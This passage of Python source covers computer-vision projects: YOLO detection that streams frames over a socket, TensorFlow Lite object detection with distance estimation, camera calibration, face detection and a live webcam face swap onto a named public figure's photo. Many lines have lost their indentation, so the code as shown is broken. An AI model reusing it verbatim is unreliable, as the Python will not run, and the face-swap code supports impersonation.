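    # 4-byte big-endian length prefix, then the JPEG payload
    sock.sendall(struct.pack('!i', len(data)) + data)
    return True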
def detect(net, meta, image, quato, thresh=.5, hier_thresh=.5, nms=.45):
# GET C,H,W, and DATA values
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, quato)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
    if nms:
        do_nms_obj(dets, num, meta.classes, nms)
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
                classid = i
                classname = meta.names[i].decode('UTF-8')
                res.append((classname, dets[j].prob[i], (b.x, b.y, b.w, b.h), classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
        # im.shape is (height, width, channels): compare x against the width
        if (x3 <= im.shape[1]) and (y3 >= 0):
            cv2.putText(im, text, (x3, y3), font, 0.5, color, 1, cv2.LINE_AA)
        else:
            cv2.putText(im, text, (int(x1), int(y1 + 6)), font, 0.5, color, 1, cv2.LINE_AA)
cv2.imshow('Detection Window', im)
cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
    t1.daemon = True  # setDaemon() is deprecated
t1.start()
# detect_net = load_net(b"./cfg/yolov3-tiny.cfg", b"yolov3-tiny.weights", 0)
# detect_net = load_net(b"./cfg/yolov3-416.cfg", b"yolov3.weights", 0)
detect_net = load_net(b"./cfg/yolov3-608.cfg", b"yolov3.weights", 0)
detect_meta = load_meta(b"cfg/coco.data")
decimg = cv2.imread('data/dog.jpg')
while True:
StartTime = time.time()
result = detect(detect_net, detect_meta, decimg, QUATO, thresh=0.7)
Latency.append(time.time() - StartTime)
print("{:.3f}".format(time.time() - StartTime))
|
Detection_Models.py
|
"""Specified Models for object detection with tensorflow and distance calculation."""
__version__ = "1.0.0"
__author__ = "Tim Rosenkranz"
__email__ = "tim.rosenkranz:stud.uni-frankfurt.de"
__credits__ = "Special thanks to The Anh Vuong who came up with the original idea. " \
              "This code is also based off of the code from Evan Juras"
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a
# video. It draws boxes and scores around the objects of interest in each frame
# from the video and calculates the distance between each of these objects.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
# The code is also based off a raspberry pi tutorial for object detection:
# https://tutorials-raspberrypi.de/raspberry-pi-objekterkennung-mittels-tensorflow-und-kamera/
#
# Import packages
import os
import cv2
import numpy as np
import sys
import time
from threading import Thread
import dlib
import importlib.util
import glob
import typing
from Detection_Basis import Detection
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Based on - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the camera"""
def __init__(self, resolution=(640, 480), framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3, resolution[0])
ret = self.stream.set(4, resolution[1])
self.width = self.stream.get(3)
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.paused = False
self.release_stream = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.release_stream:
# Close camera resources
self.stream.release()
return
elif not self.paused:
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def read_ret(self):
# Return frame and ret value
return self.frame, self.grabbed
def pause_stream(self):
# Indicate that the stream should be stopped
self.paused = True
    def continue_stream(self):
        # Indicate that the stream should resume; the update thread keeps
        # running while paused, so it must not be started a second time
        self.paused = False
def stop_stream(self):
# Indicate that stream should be released
self.release_stream = True
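# Typical VideoStream usage (a sketch; the values are illustrative):
#
#   stream = VideoStream(resolution=(640, 480), framerate=30).start()
#   time.sleep(1)          # give the capture thread time to grab a first frame
#   frame = stream.read()  # returns the most recent frame without blocking
#   stream.stop_stream()   # release the camera when done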
class LiveDetection(Detection):
"""
Class for live object detection
"""
def __init__(self,
model_name: str = 'Sample_Model',
graph_name: str = 'detect.tflite',
labelmap_name: str = 'labelmap.txt',
                 min_conf_threshold: float = 0.5,
use_tpu: str = '',
distance_threshold: int = 150,
resolution: str = '1280x720',
debug: bool = False
):
"""
Live object detection and distance calculation.
:param model_name: Name of the directory for the detection model
:param graph_name: Name of the used detection model file
:param labelmap_name: Name of the used labelmap file
:param min_conf_threshold: minimum confidence value for detected objects to be acknowledged
:param use_tpu: specifier if a TPU is to be used
:param distance_threshold: minimum distance value between objects
:param resolution: desired video resolution
"""
super(LiveDetection, self).__init__(model_name, graph_name, labelmap_name, min_conf_threshold, use_tpu,
distance_threshold)
resW, resH = resolution.split('x')
self._imW, self._imH = int(resW), int(resH)
# Initialize frame rate calculation
self._frame_rate_calc = 1
self._freq = cv2.getTickFrequency()
# Initialize video stream
self._videostream = VideoStream(resolution=(self._imW, self._imH), framerate=30).start()
time.sleep(1)
def calibrate(self,
obj_width_cm: int = 0,
obj_dist_cm: int = 0,
obj_name: str = "",
sample_count: int = 10,
debug: bool = False
):
"""
Calculation for the focal width of used camera. Note that a change in the focal width after calibrating
will result in faulty distance calculations.
:param obj_width_cm: the width of the object to calibrate with
:param obj_dist_cm: the distance of the object to calibrate with
:param obj_name: the name of the object to calibrate with
:param sample_count: number of samples to take for focal width calculation (mean will be used)
:param debug: Toggle debug information
:return: True as signal for GUI
"""
color_variation = 0
foc_measures = 0
for i in range(sample_count):
# Grab frame from video stream
frame1 = self._videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if self._floating_model:
input_data = (np.float32(input_data) - self.input_mean) / self.input_std
# Perform the actual detection by running the model with the image as input
self._interpreter.set_tensor(self._input_details[0]['index'], input_data)
self._interpreter.invoke()
# Retrieve detection results
boxes = self._interpreter.get_tensor(self._output_details[0]['index'])[
0] # Bounding box coordinates of detected objects
classes = self._interpreter.get_tensor(self._output_details[1]['index'])[
0] # Class index of detected objects
scores = self._interpreter.get_tensor(self._output_details[2]['index'])[
0] # Confidence of detected objects
obj_type = []
for i in range(len(scores)):
if (scores[i] > self._min_conf_threshold) and (scores[i] <= 1.0):
# Check for the right object (ensure correct measurement when several objects are detected)
if self._labels[int(classes[i])] != obj_name:
continue
else:
obj_type.append(str(self._labels[int(classes[i])]))
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * self._imH)))
xmin = int(max(1, (boxes[i][1] * self._imW)))
ymax = int(min(self._imH, (boxes[i][2] * self._imH)))
xmax = int(min(self._imW, (boxes[i][3] * self._imW)))
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax),
(10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
# Calculate object width in pixel
obj_width_pixels = xmax - xmin
foc_measures += (obj_width_pixels * obj_dist_cm) / obj_width_cm
# Draw label
object_name = self._labels[
int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame, 'FPS: {0:.2f}'.format(self._frame_rate_calc), (15, 35), cv2.FONT_HERSHEY_SIMPLEX, 1,
(255, 255, 0), 2, cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
            cv2.imshow('Object detector', frame)
            cv2.waitKey(1)  # give the HighGUI window a chance to actually render
self.focal_value = foc_measures / sample_count
if (debug):
print("Focal value:", self.focal_value)
return True
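    # Calibration above follows the pinhole-camera similar-triangles model:
    #   focal_px = (width_px * distance_cm) / width_cm
    # Once self.focal_value is set, the distance to an object of known width is
    # the inverse relationship (a sketch of the math, not a specific helper):
    #   distance_cm = (width_cm * focal_px) / width_px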
def calibrate_board(self,
cols: int = 0,
rows: int = 0,
debug: bool = False
):
"""Calibration via chessboard with opencv
        :param cols: columns of the chessboard to be detected
:param rows: rows of the chessboard to be detected
:param debug: debug mode
:return: if calibration was successful
"""
img_counter = 0
img_name = ""
print("++ Press SPACE to take a photo of the chess board. Press ESC to start the calibration. ++")
while True:
frame, ret = self._videostream.read_ret()
if not ret:
print("failed to grab frame")
break
cv2.imshow("test", frame)
k = cv2.waitKey(1)
if k % 256 == 27:
# ESC pressed
print("Closing photo cam. Start calibration")
break
elif k % 256 == 32:
# SPACE pressed
img_name = "Calibration_stuff/calibration_frame_{}.png".format(img_counter)
cv2.imwrite(img_name, frame)
print("{} written!".format(img_name))
img_counter += 1
# self._videostream.pause_stream()
cv2.destroyAllWindows()
return self.check_board(cols, rows, frame, debug)
def check_board(self,
cols: int = 0,
rows: int = 0,
                    image: typing.Any = None,
debug: bool = False
):
"""Calibration via chessboards with opencv
        :param cols: columns of the chessboard to be detected
        :param rows: rows of the chessboard to be detected
        :param image: the photo of the chessboard as an image array
:param debug: debug mode
:return: if detection was successful
"""
# Termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 60, 0.001)
# Object points (preparation)
object_points = np.zeros((cols * rows, 3), np.float32)
object_points[:, :2] = np.mgrid[0:rows, 0:cols].T.reshape(-1, 2)
# Storage
real_points = []
img_points = []
# Read image
#img = cv2.imread(img_name)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if debug:
cv2.imshow('img', image)
# Find chessboard corners
        ret, corners = cv2.findChessboardCorners(gray, (rows, cols), None)
        if debug:
            print("findChessboardCorners:", ret, corners)
# If found add object points
        if ret:
            real_points.append(object_points)
            # Refine corner locations to sub-pixel accuracy (cornerSubPix; the
            # original called cornerHarris, which has a different signature)
            corners2 = cv2.cornerSubPix(gray, corners, (11, 11), (-1, -1), criteria)
img_points.append(corners)
# Draw + display
cv2.drawChessboardCorners(image, (cols, rows), corners2, ret)
cv2.imshow('img', image)
cv2.waitKey(500)
# Calibrate camera
        ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(real_points, img_points, gray.shape[::-1], None, None)
frame1 = self._videostream.read()
frame = frame1.copy()
h, w = frame.shape[:2]
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 1, (w, h))
# undistort
dst = cv2.undistort(image, mtx, dist, None, newcameramtx)
# crop the image
x, y, w, h = roi
dst = dst[y:y + h, x:x + w]
cv2.imwrite('calibresult.png', dst)
return ret
def detect(self,
detect: list = [],
no_detect: list = [],
autosave: bool = False,
video_title: str = "",
debug: bool = False
):
"""
Object detection via a live camera feed and distance calculations of the objects.
"""
if (autosave):
if (debug):
print("==== AUTOSAVE ON ====")
fourcc = cv2.VideoWriter_fourcc(*'XVID')
video_out = cv2.VideoWriter(video_title + ".avi", fourcc, 20.0, (640, 480))
color_variation = 0
# for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = self._videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if self._floating_model:
input_data = (np.float32(input_data) - self.input_mean) / self.input_std
# Perform the actual detection by running the model with the image as input
self._interpreter.set_tensor(self._input_details[0]['index'], input_data)
self._interpreter.invoke()
# Retrieve detection results
boxes = self._interpreter.get_tensor(self._output_details[0]['index'])[
0] # Bounding box coordinates of detected objects
classes = self._interpreter.get_tensor(self._output_details[1]['index'])[
0] # Class index of detected objects
scores = self._interpreter.get_tensor(self._output_details[2]['index'])[
0] # Confidence of detected objects
# num = self._interpreter.get_tensor(self._output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
coords = []
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > self._min_conf_threshold) and (scores[i] <= 1.0)):
object_name = self._labels[int(classes[i])]
if (len(detect) > 0):
if object_name not in detect:
continue
if (len(no_detect) > 0):
if object_name in no_detect:
continue
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * self._imH)))
xmin = int(max(1, (boxes[i][1] * self._imW)))
ymax = int(min(self._imH, (boxes[i][2] * self._imH)))
xmax = int(min(self._imW, (boxes[i][3] * self._imW)))
if (i + 1) * 40 > 255:
color_variation += 1
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax),
(10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
# Save coordinates of detected person
coords.append([[xmin, ymin], [xmax, ymax]])
                    if len(coords) >= 1:
                        # Both branches of the original person check were
                        # identical, so call the calculation unconditionally
                        result = self._distance_calculation(coords, debug=debug)
if (debug):
print(result)
if result is None:
raise Exception("Distance calculation results in None.")
elif result[0] == 3:
pass
elif result[0] == 0:
self._draw(frame, coords, i, result[1], result[2], result[3])
elif result[0] == 1:
self._draw(frame, coords, i, result[2], result[1], result[3])
elif result[0] == 2:
pass
else:
raise Exception("Invalid distance calculation result.")
# Draw label
label = '%s: %d%%' % (object_name, int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame, 'FPS: {0:.2f}'.format(self._frame_rate_calc), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1,
(255, 255, 0), 2, cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2 - t1) / self._freq
self._frame_rate_calc = 1 / time1
if (autosave):
video_out.write(frame)
            # Poll the keyboard once per frame ('q' quits, 'w' pauses, 's'
            # resumes); repeated cv2.waitKey() calls can swallow key presses.
            key = cv2.waitKey(1)
            if key == ord('q'):
                break
            elif key == ord('w'):
                self._videostream.pause_stream()
            elif key == ord('s'):
                self._videostream.continue_stream()
if (autosave):
video_out.release()
self._videostream.stop_stream()
cv2.destroyAllWindows()
def __del__(self):
"""
Destructor.
"""
# Clean up
self._videostream.stop_stream()
cv2.destroyAllWindows()
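# Usage sketch for the live-detection class above (hypothetical: the class name
# is assumed, and the default model files must exist on disk). Kept as comments
# so importing this module does not open the camera:
#
#     detector = LiveDetection()
#     detector.detect(detect=["person"], autosave=True, video_title="run1", debug=True)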
class LiveFaceSwap():
"""
Class for live detection connected to a convolutional net
"""
def __init__(self,
resolution: str = '1280x720',
debug: bool = False
):
"""
Live object detection and distance calculation.
:param model_name: Name of the directory for the detection model
:param graph_name: Name of the used detection model file
:param labelmap_name: Name of the used labelmap file
:param min_conf_threshold: minimum confidence value for detected objects to be acknowledged
:param use_tpu: specifier if a TPU is to be used
:param distance_threshold: minimum distance value between objects
:param resolution: desired video resolution (<width>x<height>)
"""
resW, resH = resolution.split('x')
self._imW, self._imH = int(resW), int(resH)
# Initialize frame rate calculation
self._frame_rate_calc = 1
self._freq = cv2.getTickFrequency()
# Initialize video stream
self._videostream = VideoStream(resolution=(self._imW, self._imH), framerate=30).start()
time.sleep(1)
def detect(self,
cascPath: str = "haarcascade_frontalface_default.xml",
autosave: bool = False,
video_title: str = "",
debug: bool = False
):
"""
Object detection via a live camera feed and distance calculations of the objects.
"""
if (autosave):
if (debug):
print("==== AUTOSAVE ON ====")
            fourcc = cv2.VideoWriter_fourcc(*'XVID')
            # Match the writer's frame size to the stream resolution; a mismatch
            # silently produces an unplayable file.
            video_out = cv2.VideoWriter(video_title + ".avi", fourcc, 20.0, (self._imW, self._imH))
color_variation = 0
faceCascade = cv2.CascadeClassifier(cascPath)
while True:
# read and convert image
image = self._videostream.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect faces in the image
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
# flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
#print("Found {0} faces!".format(len(faces)))
# show face detections
i = 0
for (x, y, w, h) in faces:
if (i + 1) * 40 > 255:
color_variation += 1
cv2.rectangle(image, (x, y), (x+w, y+h), (10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
i += 1
cv2.imshow("Face detector", image)
if (autosave):
video_out.write(image)
            # Poll the keyboard once per frame ('q' quits, 'w' pauses, 's'
            # resumes); repeated cv2.waitKey() calls can swallow key presses.
            key = cv2.waitKey(1)
            if key == ord('q'):
                break
            elif key == ord('w'):
                self._videostream.pause_stream()
            elif key == ord('s'):
                self._videostream.continue_stream()
if (autosave):
video_out.release()
self._videostream.stop_stream()
cv2.destroyAllWindows()
    def face_swap(self, swap_img="barack_obama.jpeg"):
"""
Live face swapping
:param swap_img: The source of the image to swap face with
"""
landmarks_points = None
landmarks_points2 = None
def extract_index_nparray(nparray):
index = None
for num in nparray[0]:
index = num
break
return index
img = cv2.imread("./swap_faces/"+swap_img)
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
mask = np.zeros_like(img_gray)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
indexes_triangles = []
# Face 1
faces = detector(img_gray)
for face in faces:
landmarks = predictor(img_gray, face)
landmarks_points = []
for n in range(0, 68):
x = landmarks.part(n).x
y = landmarks.part(n).y
landmarks_points.append((x, y))
# cv2.circle(img, (x, y), 3, (0, 0, 255), -1)
points = np.array(landmarks_points, np.int32)
convexhull = cv2.convexHull(points)
# cv2.polylines(img, [convexhull], True, (255, 0, 0), 3)
cv2.fillConvexPoly(mask, convexhull, 255)
face_image_1 = cv2.bitwise_and(img, img, mask=mask)
# Delaunay triangulation
rect = cv2.boundingRect(convexhull)
subdiv = cv2.Subdiv2D(rect)
subdiv.insert(landmarks_points)
triangles = subdiv.getTriangleList()
triangles = np.array(triangles, dtype=np.int32)
indexes_triangles = []
for t in triangles:
pt1 = (t[0], t[1])
pt2 = (t[2], t[3])
pt3 = (t[4], t[5])
index_pt1 = np.where((points == pt1).all(axis=1))
index_pt1 = extract_index_nparray(index_pt1)
index_pt2 = np.where((points == pt2).all(axis=1))
index_pt2 = extract_index_nparray(index_pt2)
index_pt3 = np.where((points == pt3).all(axis=1))
index_pt3 = extract_index_nparray(index_pt3)
if index_pt1 is not None and index_pt2 is not None and index_pt3 is not None:
triangle = [index_pt1, index_pt2, index_pt3]
indexes_triangles.append(triangle)
while True:
img2 = self._videostream.read()
img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
img2_new_face = np.zeros_like(img2)
# Face 2
faces2 = detector(img2_gray)
for face in faces2:
landmarks = predictor(img2_gray, face)
landmarks_points2 = []
for n in range(0, 68):
x = landmarks.part(n).x
y = landmarks.part(n).y
landmarks_points2.append((x, y))
# cv2.circle(img2, (x, y), 3, (0, 255, 0), -1)
points2 = np.array(landmarks_points2, np.int32)
convexhull2 = cv2.convexHull(points2)
lines_space_mask = np.zeros_like(img_gray)
lines_space_new_face = np.zeros_like(img2)
if landmarks_points is None or landmarks_points2 is None:
continue
# Triangulation of both faces
for triangle_index in indexes_triangles:
# Triangulation of the first face
tr1_pt1 = landmarks_points[triangle_index[0]]
tr1_pt2 = landmarks_points[triangle_index[1]]
tr1_pt3 = landmarks_points[triangle_index[2]]
triangle1 = np.array([tr1_pt1, tr1_pt2, tr1_pt3], np.int32)
rect1 = cv2.boundingRect(triangle1)
(x, y, w, h) = rect1
cropped_triangle = img[y: y + h, x: x + w]
cropped_tr1_mask = np.zeros((h, w), np.uint8)
points = np.array([[tr1_pt1[0] - x, tr1_pt1[1] - y],
[tr1_pt2[0] - x, tr1_pt2[1] - y],
[tr1_pt3[0] - x, tr1_pt3[1] - y]], np.int32)
cv2.fillConvexPoly(cropped_tr1_mask, points, 255)
# Triangulation of second face
tr2_pt1 = landmarks_points2[triangle_index[0]]
tr2_pt2 = landmarks_points2[triangle_index[1]]
tr2_pt3 = landmarks_points2[triangle_index[2]]
triangle2 = np.array([tr2_pt1, tr2_pt2, tr2_pt3], np.int32)
rect2 = cv2.boundingRect(triangle2)
(x, y, w, h) = rect2
cropped_tr2_mask = np.zeros((h, w), np.uint8)
points2 = np.array([[tr2_pt1[0] - x, tr2_pt1[1] - y],
[tr2_pt2[0] - x, tr2_pt2[1] - y],
[tr2_pt3[0] - x, tr2_pt3[1] - y]], np.int32)
cv2.fillConvexPoly(cropped_tr2_mask, points2, 255)
# Warp triangles
points = np.float32(points)
points2 = np.float32(points2)
M = cv2.getAffineTransform(points, points2)
warped_triangle = cv2.warpAffine(cropped_triangle, M, (w, h))
warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=cropped_tr2_mask)
# Reconstructing destination face
img2_new_face_rect_area = img2_new_face[y: y + h, x: x + w]
img2_new_face_rect_area_gray = cv2.cvtColor(img2_new_face_rect_area, cv2.COLOR_BGR2GRAY)
_, mask_triangles_designed = cv2.threshold(img2_new_face_rect_area_gray, 1, 255, cv2.THRESH_BINARY_INV)
warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=mask_triangles_designed)
img2_new_face_rect_area = cv2.add(img2_new_face_rect_area, warped_triangle)
img2_new_face[y: y + h, x: x + w] = img2_new_face_rect_area
# Face swapped (putting 1st face into 2nd face)
img2_face_mask = np.zeros_like(img2_gray)
img2_head_mask = cv2.fillConvexPoly(img2_face_mask, convexhull2, 255)
img2_face_mask = cv2.bitwise_not(img2_head_mask)
img2_head_noface = cv2.bitwise_and(img2, img2, mask=img2_face_mask)
result = cv2.add(img2_head_noface, img2_new_face)
(x, y, w, h) = cv2.boundingRect(convexhull2)
center_face2 = (int((x + x + w) / 2), int((y + y + h) / 2))
seamlessclone = cv2.seamlessClone(result, img2, img2_head_mask, center_face2, cv2.MIXED_CLONE)
cv2.imshow("img2", img2)
cv2.imshow("clone", seamlessclone)
cv2.imshow("result", result)
key = cv2.waitKey(1)
if key == ord('q'):
break
self._videostream.stop_stream()
cv2.destroyAllWindows()
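# A self-contained sketch (hypothetical helper, not called anywhere in this
# file) of the per-triangle affine warp that face_swap performs for every
# Delaunay triangle: three source points are mapped onto three destination
# points, the patch is warped, and pixels outside the triangle are masked off.
def _warp_triangle_sketch(src_img, src_tri, dst_tri, dst_size):
    src_pts = np.float32(src_tri)  # 3x2 (x, y) points in the source image
    dst_pts = np.float32(dst_tri)  # 3x2 (x, y) points in the destination
    # An affine transform is fully determined by three point correspondences
    M = cv2.getAffineTransform(src_pts, dst_pts)
    warped = cv2.warpAffine(src_img, M, dst_size)  # dst_size = (width, height)
    # Keep only the pixels inside the destination triangle
    mask = np.zeros((dst_size[1], dst_size[0]), np.uint8)
    cv2.fillConvexPoly(mask, np.int32(dst_pts), 255)
    return cv2.bitwise_and(warped, warped, mask=mask)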
class VideoDetection(Detection):
"""
Class for video object detection
"""
def __init__(self,
model_name: str = 'Sample_Model',
graph_name: str = 'detect.tflite',
labelmap_name: str = 'labelmap.txt',
                 min_conf_threshold: float = 0.5,
use_tpu: str = '',
distance_threshold: int = 150,
debug: bool = False
):
"""
Video object detection and distance calculation.
:param model_name: Name of the directory for the detection model
:param graph_name: Name of the used detection model file
:param labelmap_name: Name of the used labelmap file
:param min_conf_threshold: minimum confidence value for detected objects to be acknowledged
:param use_tpu: specifier if a TPU is to be used
:param distance_threshold: minimum distance value between objects
"""
super(VideoDetection, self).__init__(model_name, graph_name, labelmap_name, min_conf_threshold, use_tpu,
distance_threshold)
self._video = None
self.stop = False
def detect(self,
video_name: str = "Sample_Video/testvideo1.mp4",
focal_width: int = 1000,
debug: bool = False
):
"""
Object detection via a video feed and distance calculations of the objects.
:param video_name: path to the video that should be used for detection
:param focal_width: focal width of the used camera in the video
"""
self.focal_value = focal_width
# Path to video file
video_path = os.path.join(self._cwd_path, video_name)
color_variation = 0
# Open video file
self._video = cv2.VideoCapture(video_path)
imW = self._video.get(cv2.CAP_PROP_FRAME_WIDTH)
imH = self._video.get(cv2.CAP_PROP_FRAME_HEIGHT)
while (self._video.isOpened()):
# Acquire frame and resize to expected shape [1xHxWx3]
ret, frame = self._video.read()
if not ret:
print('Reached the end of the video!')
break
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if self._floating_model:
input_data = (np.float32(input_data) - self.input_mean) / self.input_std
# Perform the actual detection by running the model with the image as input
self._interpreter.set_tensor(self._input_details[0]['index'], input_data)
self._interpreter.invoke()
# Retrieve detection results
boxes = self._interpreter.get_tensor(self._output_details[0]['index'])[
0] # Bounding box coordinates of detected objects
classes = self._interpreter.get_tensor(self._output_details[1]['index'])[
0] # Class index of detected objects
scores = self._interpreter.get_tensor(self._output_details[2]['index'])[0] # Confidence of detected objects
# num = interpreter.get_tensor(self.output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
coords = []
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > self._min_conf_threshold) and (scores[i] <= 1.0)):
object_name = self._labels[int(classes[i])]
if (object_name != "person" and object_name != "teddy bear" and object_name != "chair"):
continue
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * imH)))
xmin = int(max(1, (boxes[i][1] * imW)))
ymax = int(min(imH, (boxes[i][2] * imH)))
xmax = int(min(imW, (boxes[i][3] * imW)))
if (i + 1) * 40 > 255:
color_variation += 1
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax),
(10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
# Save coordinates of detected person
coords.append([[xmin, ymin], [xmax, ymax]])
                    if (len(coords) > 1):
                        # Both branches of the previous person/other split made the
                        # same call, so a single call preserves the behavior.
                        result = self._distance_calculation(coords, debug=debug)
                        if (debug):
                            print(result)
                        if result is None:
                            raise Exception("Distance calculation results in None.")
                        elif result[0] in (2, 3):
                            pass
                        elif result[0] in (0, 1):
                            self._draw(frame, coords, result[1], result[2], result[3], result[4])
                        else:
                            raise Exception("Invalid distance calculation result.")
                    else:
                        # Fewer than two detections; no pairwise distance to draw.
                        pass
# Draw label
label = '%s: %d%%' % (object_name, int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
def __del__(self):
"""
Destructor.
"""
# Clean up
if self._video is not None:
self._video.release()
cv2.destroyAllWindows()
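# Usage sketch (hypothetical; assumes the sample model directory and test video
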